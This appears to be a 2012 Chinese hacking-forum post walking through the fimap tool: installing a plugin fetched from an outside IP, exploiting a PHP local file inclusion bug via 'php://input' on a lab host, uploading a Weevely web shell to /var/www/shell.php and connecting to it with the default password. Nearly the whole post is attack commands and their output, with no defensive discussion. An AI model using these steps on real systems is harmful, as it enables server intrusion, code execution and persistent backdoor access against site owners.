切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
240 PHP文件包含漏洞 3 fimap[复制链接]
发表于 2012-8-29 01:42:11 | 显示全部楼层 |!read_mode!
安装插件
  1. root@Dis9Team:/pen/web/fimap/src# ./fimap.py -I
  2. fimap v.1.00_svn (Uitmuntende programmatuur alleen voor jij!)
  3. :: Automatic LFI/RFI scanner and exploiter
  4. :: by Iman Karim (fimap.dev@gmail.com)

  5. Requesting list of plugins...
复制代码
等待一下选择
  1. Requesting list of plugins...
  2. ##################################################################################################################
  3. #LIST OF TRUSTED PLUGINS                                                                                         #
  4. ##################################################################################################################
  5. #[1] msf binding by Xavier Garcia <xavi.garcia@gmail.com> (Obsolete\Abandoned) - At version 1 not installed.     #
  6. #[2] Weevils injector by Darren "Infodox" Martyn <infodox@insecurety.net> - At version 2 not installed.          #
  7. #[3] AES HTTP reverse shell by Darren "Infodox" Martyn <infodox@insecurety.net> - At version 1 not installed.    #
  8. #[q] Cancel and Quit.                                                                                            #
  9. ##################################################################################################################
  10. Choose a plugin to install:
复制代码
Weevely

选择2

  1. Choose a plugin to install: 2
  2. Downloading plugin 'weevils' (http://85.214.27.38/fimap_plugins/weevils-0.2.tar.gz)...
  3. Unpacking plugin...
  4. Plugin 'Upload Weevely' installed successfully!
  5. root@Dis9Team:/pen/web/fimap/src#
复制代码
利用:


  1. root@Dis9Team:/pen/web/fimap/src# ./fimap.py -x
  2. fimap v.1.00_svn (Uitmuntende programmatuur alleen voor jij!)
  3. :: Automatic LFI/RFI scanner and exploiter
  4. :: by Iman Karim (fimap.dev@gmail.com)

  5. ###############################################
  6. #:: List of Domains ::                        #
  7. ###############################################
  8. #[1] 5.5.5.3 (Linux 2.6.35-22-generic-pae)    #
  9. #[q] Quit                                     #
  10. ###############################################
  11. WARNING: Some domains may be not listed here because dynamic_rfi is not configured!
  12. Choose Domain: 1
  13. #############################################################################################
  14. #:: FI Bugs on '5.5.5.3' ::                                                                 #
  15. #############################################################################################
  16. #[1] URL: '/lif.php?file=info.php' injecting file: 'php://input' using GET-param: 'file'    #
  17. #[q] Quit                                                                                   #
  18. #############################################################################################
  19. WARNING: Some bugs are suppressed because dynamic_rfi is not configured!
  20. Choose vulnerable script: 1
  21. [07:17:07] [INFO] Testing PHP-code injection thru POST...
  22. [07:17:07] [OUT] PHP Injection works! Testing if execution works...
  23. [07:17:07] [INFO] Testing execution thru 'popen[b64]'...
  24. [07:17:07] [OUT] Execution thru 'popen[b64]' works!
  25. #####################################################
  26. #:: Available Attacks - PHP and SHELL access ::     #
  27. #####################################################
  28. #[1] Spawn fimap shell                              #
  29. #[2] Spawn pentestmonkey's reverse shell            #
  30. #[3] [Upload Weevely] Uploads a Weevily Backdoor    #
  31. #[4] [Test Plugin] Show some info                   #
  32. #[q] Quit                                           #
  33. #####################################################
  34. Choose Attack:
复制代码
选择刚才装的:
#[3] [Upload Weevely] Uploads a Weevily Backdoor #
选择

  1. Choose Attack: 3
  2. Uploading shell to //var/www/shell.php  ...
  3. Uploaded 565 bytes
  4. Use Weevely to connect!
复制代码
连接试试 默认密码 lolcatsFTWhttp://5.5.5.3/shell.php
  1. root@Dis9Team:/pen/door/Weevely# ./weevely.py http://5.5.5.3/shell.php lolcatsFTW
  2.       ________                      __
  3.      |  |  |  |-----.----.-.--.----'  |--.--.
  4.      |  |  |  |  -__| -__| |  | -__|  |  |  |
  5.      |________|_____|____|___/|____|__|___  | v0.7
  6.                                       |_____|
  7.               Stealth tiny web shell

  8. [+] Starting terminal, shell probe may take a while
  9. [+] List modules with <tab> and show help with :show [module name]

  10. www-data@ubuntu:/var/www$ pwd
  11. /var/www
  12. www-data@ubuntu:/var/www$
复制代码



操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-9-20 13:31

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部